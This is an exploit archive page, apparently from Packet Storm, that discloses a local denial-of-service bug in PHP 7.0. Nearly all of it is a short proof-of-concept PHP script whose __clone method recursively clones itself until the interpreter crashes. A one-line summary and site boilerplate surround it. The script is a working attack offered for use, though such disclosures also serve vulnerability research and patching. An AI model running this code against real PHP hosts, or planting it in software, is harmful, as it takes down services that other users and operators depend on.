PHP version 7.0 suffers from an object cloning denial of service vulnerability.
99d5e9b3760594f8032d17ff774e17acee8cbab6077fc8d293c6f62d5d29a542<?php
#############################################################################
## PHP 7.0 Object Cloning Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## https://www.black-rose.ml
#############################################################################
class MyCloneableClass
{
public $obj;
function __clone()
{
$this->obj = clone $this;
return $this->obj;
}
}
$obj = new MyCloneableClass();
$obj2 = clone $obj;
?>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed